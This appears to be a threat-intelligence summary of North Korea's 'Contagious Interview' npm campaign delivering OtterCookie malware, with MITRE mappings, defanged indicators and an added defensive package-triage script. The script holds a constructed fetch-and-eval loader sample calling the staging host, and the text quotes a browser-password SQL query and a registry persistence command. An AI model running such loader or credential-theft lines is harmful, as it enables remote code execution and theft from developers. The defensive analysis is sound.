North Korean state-sponsored operators running the Contagious Interview campaign have injected at least 197 malicious npm packages that act as loaders to fetch OtterCookie payloads from a Vercel staging endpoint and a threat actor-controlled GitHub account. The campaign uses typosquatted utilities and polished crypto lures to deliver a multi-platform infostealer/RAT that targets developer systems and crypto wallets. #OtterCookie #ContagiousInterview
Key points
- The Contagious Interview operation added at least 197 malicious npm packages, accounting for 31,000+ downloads, targeting blockchain/Web3 developers with fake job interviews and test assignments.
- Multiple malicious npm packages (e.g., tailwind-magic, node-tailwind) act as import-time loaders that contact a Vercel staging server (tetrismic[.]vercel[.]app) to eval and execute returned JavaScript.
- Analysis traced the loader packages to a threat actor GitHub account (stardev0914) and a delivery stack where GitHub hosts code, Vercel stages payloads, and a separate C2 (144[.]172[.]104[.]117) handles data collection and tasking.
- The second-stage payload is an OtterCookie variant that performs VM/sandbox detection, host fingerprinting, long-lived C2, remote shell, clipboard theft, keylogging, multi-monitor screenshots, recursive filesystem scanning, and browser/wallet extension data theft across Windows, macOS, and Linux.
- Threat actors used polished crypto-themed repositories and cloned DEX front-ends (e.g., dexproject / knightsbridge-dex) as lures that wire malicious npm dependencies into otherwise normal-looking projects.
- Defensive recommendations: treat npm installs as RCE risk, pin dependencies and lockfiles, apply egress controls, require code review for templates, and integrate real-time package analysis and install-time behavioral checks.
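As an added example (not code from the Socket write-up), the following heuristic triages an installed npm package for the loader pattern described above: an install-time lifecycle script, source that fetches remote content and passes it to eval(), and references to the staging/C2 indicators quoted here. It works on an in-memory view of a package (parsed package.json plus source text) with constructed samples, so it runs offline; walking a real node_modules tree into that shape is an assumed, separate step.

```javascript
// Added example, not from the write-up: install-time behavioural triage of an npm package.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Staging and C2 indicators quoted in the write-up, with defanging brackets removed.
const KNOWN_IOCS = ['tetrismic.vercel.app', '144.172.104.117'];
const NETWORK_RE = /\b(?:https?\.(?:get|request)|fetch|axios(?:\.\w+)?)\s*\(/;
const EVAL_RE = /\b(?:eval|new\s+Function)\s*\(/;

// pkg = { name, manifest: <parsed package.json>, sources: { 'relative/path.js': 'code' } }
function triagePackage(pkg) {
  const findings = [];
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ kind: 'lifecycle', detail: `${hook}: ${scripts[hook]}` });
  }
  for (const [file, code] of Object.entries(pkg.sources || {})) {
    const refanged = code.replace(/\[\.\]/g, '.');
    if (NETWORK_RE.test(code) && EVAL_RE.test(code)) {
      findings.push({ kind: 'fetch-eval', detail: `${file}: remote content reaches eval()` });
    }
    for (const ioc of KNOWN_IOCS) {
      if (refanged.includes(ioc)) findings.push({ kind: 'ioc', detail: `${file}: references ${ioc}` });
    }
  }
  // Lifecycle hooks alone are common in benign packages (native builds), so they only
  // earn 'review'; fetch+eval or a known indicator is enough to block the install.
  const hard = findings.some(f => f.kind === 'fetch-eval' || f.kind === 'ioc');
  const verdict = hard ? 'block' : findings.length ? 'review' : 'clean';
  return { name: pkg.name, verdict, findings };
}

// Constructed samples, not real package contents. The first sketches the loader the
// write-up describes (postinstall hook, fetch-then-eval on import); it is not runnable code.
const SAMPLES = [
  { name: 'loader-like (constructed)',
    manifest: { scripts: { postinstall: 'node src/lib/index.js' } },
    sources: { 'src/lib/index.js':
      "https.get('https://tetrismic[.]vercel[.]app/api/ipcheck', r => collect(r, body => eval(body))) // sketch" } },
  { name: 'native-addon (constructed)',
    manifest: { scripts: { install: 'node-gyp rebuild' } },
    sources: { 'index.js': "module.exports = require('./build/Release/addon.node');" } },
  { name: 'plain-util (constructed)',
    manifest: { scripts: { test: 'node test.js' } },
    sources: { 'index.js': 'module.exports = s => s.trim();' } },
];

function triageAll(samples = SAMPLES) { return samples.map(triagePackage); }

for (const r of triageAll()) {
  console.log(r.verdict.padEnd(6), r.name, r.findings.map(f => f.detail).join('; '));
}
```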
MITRE Techniques
- [T1583.001] Acquire Infrastructure: Domains – adversaries used hosted domains/services for staging and delivery (‘tetrismic[.]vercel[.]app’).
- [T1583.006] Acquire Infrastructure: Web Services – Vercel was used to serve dynamic payloads (‘tetrismic[.]vercel[.]app/api/ipcheck’).
- [T1585] Establish Accounts – threat actors maintained GitHub accounts and repositories to host deceptive projects (‘github[.]com/stardev0914’).
- [T1587] Develop Capabilities – actors developed loader packages and OtterCookie variants as part of a custom delivery stack (‘OtterCookie malware’).
- [T1587.001] Develop Capabilities: Malware – the campaign produced and iterated on OtterCookie/BeaverTail-like malware (‘OtterCookie version 4’).
- [T1608.001] Stage Capabilities: Upload Malware – GitHub and Vercel deployments were used to stage and rotate payloads (‘38 Vercel “Production” deployments’).
- [T1195.002] Supply Chain Compromise: Compromise Software Supply Chain – npm packages typosquatted legitimate utilities to execute malicious postinstall/import-time code (‘tailwind-magic is a typosquatted and backdoored clone’).
- [T1059.007] Command and Scripting Interpreter: JavaScript – arbitrary JavaScript returned by the staging server was eval()ed inside Node.js (‘eval the returned JavaScript’).
- [T1204.002] User Execution: Malicious File – postinstall scripts executed malicious loader code at install time (‘postinstall script executes src/lib/index.js’).
- [T1204.005] User Execution: Malicious Library – malicious libraries execute on import and provide RCE in developer environments (‘on import, POSTs the local package version … and evals the response’).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Windows persistence via a Run registry entry (‘Adds a Run entry HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v “NodeHelper”’).
- [T1546.016] Event Triggered Execution: Installer Packages – installer/postinstall behavior triggers remote loader execution (‘postinstall script executes src/lib/index.js’).
- [T1036] Masquerading – typosquatting and cloned projects impersonate legitimate libraries and DEX front-ends (‘typosquatted fork of the legitimate tailwind-merge library’).
- [T1497] Virtualization/Sandbox Evasion – the payload checks system vendor/model and /proc/cpuinfo for hypervisor strings (‘wmic computersystem get model,manufacturer’ and ‘/proc/cpuinfo’ checks).
- [T1656] Impersonation – use of polished crypto project branding and cloned DEX front-ends to impersonate legitimate projects (‘cloned Knightsbridge DEX front-end’).
- [T1056.001] Input Capture: Keylogging – the implant uses GlobalKeyboardListener to capture system-wide keystrokes and exfiltrate them (‘GlobalKeyboardListener … to capture system-wide keystrokes’).
- [T1539] Steal Web Session Cookie – browser session data and cookies are collected from Chrome/Brave profiles (‘Collection of browser credentials and wallet extension data from Chrome and Brave’).
- [T1555.001] Credentials from Password Stores: Keychain – targeted collection from platform credential stores, implied by the cross-platform credential harvesting (‘Collection of browser credentials and wallet extension data’).
- [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – reading the browser Login Data SQLite database to extract stored credentials (‘SELECT origin_url, username_value, password_value FROM logins’).
- [T1082] System Information Discovery – host fingerprinting and OS/platform enumeration are performed before C2 registration (‘Send host fingerprint and VM flag to C2’).
- [T1083] File and Directory Discovery – recursive filesystem scans search for secrets and wallet-related files (‘recursive file-system search for secrets, wallets, and sensitive documents’).
- [T1217] Browser Information Discovery – enumerates browser profiles and wallet extension IDs to harvest extension data (‘targeted wallet extension IDs: …’).
- [T1005] Data from Local System – the malware exfiltrates files and screenshots from the local system (‘uploads matching files to /total’).
- [T1113] Screen Capture – multi-monitor screenshots are captured and exfiltrated (‘multi-monitor screenshot capture’).
- [T1115] Clipboard Data – periodic clipboard reads and exfiltration are performed (‘Every 5s: read clipboard and POST { uid, clip, hostname } to /clip’).
- [T1119] Automated Collection – background workers perform continuous credential harvesting and file collection (‘launches three parallel modules: Clipboard stealer, Keylogger, and Browser credential theft’).
- [T1105] Ingress Tool Transfer – the initial npm packages fetch and execute secondary payloads from staging servers (‘npm package extracts this field and executes it with eval()’).
- [T1571] Non-Standard Port – C2 communication uses a non-standard port on the C2 host (‘144[.]172[.]104[.]117:5918’).
- [T1041] Exfiltration Over C2 Channel – collected data is uploaded to the C2 endpoints (e.g., ‘/upload’, ‘/total’).
- [T1657] Financial Theft – targeted collection of wallet seed phrases, extensions, and credentials to drain digital assets (‘harvest credentials, seed phrases, wallet data, and sensitive documents’).
Indicators of Compromise
- [Domain / Host] staging and lure sites used for payload delivery and demos – tetrismic[.]vercel[.]app, knightsbridge-dex[.]vercel[.]app, and multiple other Vercel-hosted demo sites.
- [IP Address] primary C2 server and ports – 144[.]172[.]104[.]117, 144[.]172[.]104[.]117:5918 (C2 endpoints and API ports used for beaconing, commands, and uploads).
- [URL / Endpoint] payload fetch and C2 API paths – https://tetrismic[.]vercel[.]app/api/ipcheck, http://144[.]172[.]104[.]117:5918/api/service/process and other endpoints (/command, /output, /clip, /total, /upload).
- [npm Package Names] loader and malicious packages observed in the supply chain – tailwind-magic, node-tailwind, and many others (197+ malicious packages added since Oct 10, 2025, including node-tailwind-magic, react-modal-select, etc.).
- [GitHub Account / Repositories] threat actor infrastructure and code hosting – github[.]com/stardev0914 (stardev0914 account) and repositories such as tetrismic and tailwind-magic, among ~18 repositories.
- [File Paths / Filenames] loader and payload artifacts referenced in packages – dist/ (exported module), src/lib/index.js (postinstall loader), main.js (staging payload file) and Login Data (browser SQLite DB file).
- [Email Addresses / Aliases] numerous throwaway aliases observed as npm/publishing/registration artifacts – examples: abigailzebrairses36717@outlook[.]com, alex9901@… and many other alias addresses (dozens listed in artifacts).
Read more: https://socket.dev/blog/north-korea-contagious-interview-npm-attacks